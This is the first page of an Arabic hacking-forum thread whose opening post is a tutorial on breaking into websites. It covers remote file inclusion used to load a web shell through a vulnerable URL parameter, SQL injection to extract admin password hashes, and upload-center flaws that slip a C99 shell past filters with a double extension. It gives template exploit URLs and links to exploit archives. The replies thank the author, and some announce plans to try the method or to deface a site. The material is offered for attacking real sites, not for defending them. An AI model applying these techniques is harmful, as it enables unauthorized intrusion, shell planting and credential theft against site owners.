إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس


صفحة 1 من 5 123 ... الأخيرةالأخيرة
النتائج 1 إلى 10 من 42

الموضوع: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

  1. #1
    هكر مجتهد الصورة الرمزية millen!um
    تاريخ التسجيل
    Jun 2010
    الدولة
    في الدنيا مؤقّتا و أنتظر الرحيل
    المشاركات
    612

    New إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

    طبعا إخواني نعلم أن كل شيء صنعه الإنسان فيه أخطاء فهو بشر و ليس إله لذلك فالثغرات عبارة عن اخطاء يقع فيها مصمم البرنامج او سكربت معين ... ومن خلال هذه الاخطاء يجد الهكر
    منافذ لدخول الى المواقع .. والوصول الى السيرفر

    Powered by vBulletin Version = يدل على سكربت المنتدى ... وهكذا



    1 - ثغرات الفايل انكلود (( Remote File Inclusion Vulnerability ))
    يقصد بهذا النوع من الثغرات ... ان المصمم وقع فى خط برمجى وهذا الخطء يسمح لى رابط ملف خارجى بالموقع
    وطبعا الملف الخارجي يكون ( الشل = اداه اختراق )
    وهذا تكملة لما قلته لكم طبعا منذ قليل بأن كل شيء صنعه الإنسان فيه أخطاء


    - ثغرة الفايل انكلود ... طبعا نحن قلنا ان هذا النوع من الثغرات تسمح لى رابط ملف خارجى بالموقع بو اسطة متغير
    معين وطبعا الملف الخارجي يكون ( الشل = اداه اختراق )

    على سبيل المثال ... عندى موقع www.google.com/vb/ مصاب بثغرة فايل فى سكربت المنتدى الى هو VB
    والخط على صفحة faq.php والمتغير الى يسمح لى بربط الشل هو almuhajer
    فان الثغرة والاستغلال يكون بهذا الشكل ...
    /ww.google.com/vb/faq.php?almuhajer=إسم الشل.txt?cmd


    تذكر ان ثغرات الانكلود تتكون من ( السكربت المصاب / مكان المجلد / الصفحة التى يوجد بها المتغير الى يسمح بربط الشل )


    http://www.google.com/Folder/pag.php...=youshell.txt?
    الموقع = www.xxx.com
    مجلد السكربت = Folder
    الصفحة التى فيها المتغير الى يسمح لنا بجلب ملف خارجى = pag.php
    المتغير الى نربط به الملف الخارجى ( الشل ) incloud
    علامة =
    الشل بصغية تكتس = youshell.txt
    وعلامة ؟


    وكذا نحن الان عرفنا كيفية التعامل مع الثغرات الفايل انكلود

    لكن كيف يا مهاجر سنعرف هذه الملفات التي تحوي أخطاء و بالتالي نستغلّها ؟؟
    هناك مواقع ستساعدنا مثل

    من هذه المواقع http://milw0rm.org وكذلك http://securityfocus.com


    طيب ناخذ مثال من المواقع السيكورتى ... http://milw0rm.org/***apps.php ونبحث عن الثغرات الفايل الانكلود
    هذا مثال على الثغرة http://milw0rm.org/exploits/4607



    و هناك عدة أنواع من الشل تختلف في عدة أشياء مثل تخطي السايف مود و التنقل و الإمكانية التي تتيحها لك على السيرفر وفق صلاحياتك

    النوع الثاني من الثغرات
    ثغرات قواعد البيانات (( Remote SQL Injection Vulnerability )) ويقصد بها الثغرات التى تتح لنا معرفة معلومات لمجموعه معنية // علي سبيل المثال معرفه اسم الدخول وكلمة المرور لمدير الموقع
    وتعرف هذا الثغرة باسم SQL واستعملها سهل جداا .. تضع الاستغلال على المتصفح الانترنيت اكسلبور .. وتلاحظ الباس
    وغالبا يكون الباس مشفر MD5 وهناك الكثير من المواقع الى تفك التشفير ...

    ناخذ مثال على هذا النوع http://milw0rm.org/exploits/4620





    النوع الثالث ثغرات الرفع ( ثغرات مراكز التحميل ) وهى تقريبا اسهل انواع الثغرات .. فقط تقوم برفع الشل ة يقول لك ادارج الملف ثم اضغط على الابلود بمعنى رفع ... وغلبااا نحتاج الى خداع المركز
    فى الامتداد بحث يكون ا متداد الشل الى نسخدمه هكذا C99.php.rar


    تحيّاتي لكم
    almuhajer
    منتديات جيوش الهكرز
    التعديل الأخير تم بواسطة millen!um ; 07-08-2010 الساعة 06:56 AM

  2. #2
    هكر مجتهد الصورة الرمزية millen!um
    تاريخ التسجيل
    Jun 2010
    الدولة
    في الدنيا مؤقّتا و أنتظر الرحيل
    المشاركات
    612

    افتراضي رد: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

    و الله الشرح متعوب فيه أين الردود ؟؟ لن أضع دروس إذا لم أرى تفاعل
    أضن إنوا الشرح سيّئ
    الله يهديكم

  3. #3

    افتراضي رد: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

    والله الشرح تمام
    وتستاهل أحلى رد وتقييم
    وان شاء الله اجربها الآن
    تقبل مروري
    اخوك
    عآزف الكيبورد

  4. #4
    هكر مجتهد الصورة الرمزية millen!um
    تاريخ التسجيل
    Jun 2010
    الدولة
    في الدنيا مؤقّتا و أنتظر الرحيل
    المشاركات
    612

    افتراضي رد: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

    بـــــــارك الله فيك على تشجيعي دائما أخي

  5. #5

    افتراضي رد: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

    تستاهل كل احترام على المعلومات القيمه
    شكرا جزيلا وننتظر منك المزيد
    [gdwl](العزة لله ولرسوله وللمؤمنين ساتعلم التهكير مهما يصير
    لمحاربة أعداء الله ورسوله)[/gdwl]

  6. #6
    هكر مجتهد الصورة الرمزية millen!um
    تاريخ التسجيل
    Jun 2010
    الدولة
    في الدنيا مؤقّتا و أنتظر الرحيل
    المشاركات
    612

    افتراضي رد: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

    اقتباس المشاركة الأصلية كتبت بواسطة krkr333 مشاهدة المشاركة
    تستاهل كل احترام على المعلومات القيمه
    شكرا جزيلا وننتظر منك المزيد
    مشكور أخي على مرورك العطر ...بارك الله فيك

  7. #7

    افتراضي رد: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

    موضوع اكثر من راااااااااااااائع فديتك يااقلبي ..! وجاري تنزيل السكبريت لاايجاد الثغره فيه ...! وتجربته ....! وان شااء الله اوريك الاندكس لموقع ابااحي ...!...

  8. #8
    هكر مجتهد الصورة الرمزية millen!um
    تاريخ التسجيل
    Jun 2010
    الدولة
    في الدنيا مؤقّتا و أنتظر الرحيل
    المشاركات
    612

    افتراضي رد: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

    مشكور أخي ..إن شاء الله
    منور الموضوع

  9. #9

    افتراضي رد: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

    شرح وافي لبىآآ قلبك وجاري التجربة ^_+

  10. #10

    افتراضي رد: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

    شكرااا اخي والله افدتني كثيراا
    وغالبا نحتاج الى خداع المركز بالامتداد c99.php.rar
    مشكور كتير

صفحة 1 من 5 123 ... الأخيرةالأخيرة

المواضيع المتشابهه

  1. شرح استغلال ثغرات remote file include
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 89
    آخر مشاركة: 05-11-2012, 04:32 PM
  2. الدرس الثالث (دينامكية عمل Remote File include)
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 11
    آخر مشاركة: 03-16-2012, 09:14 PM
  3. رفع الشيل عبر ثغرات remote file include
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 45
    آخر مشاركة: 03-16-2012, 09:13 PM
  4. شرح ثغرات Local File Include
    بواسطة AtT4CKxT3rR0r1ST في المنتدى قسم الثغرات
    مشاركات: 1
    آخر مشاركة: 02-01-2010, 06:48 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •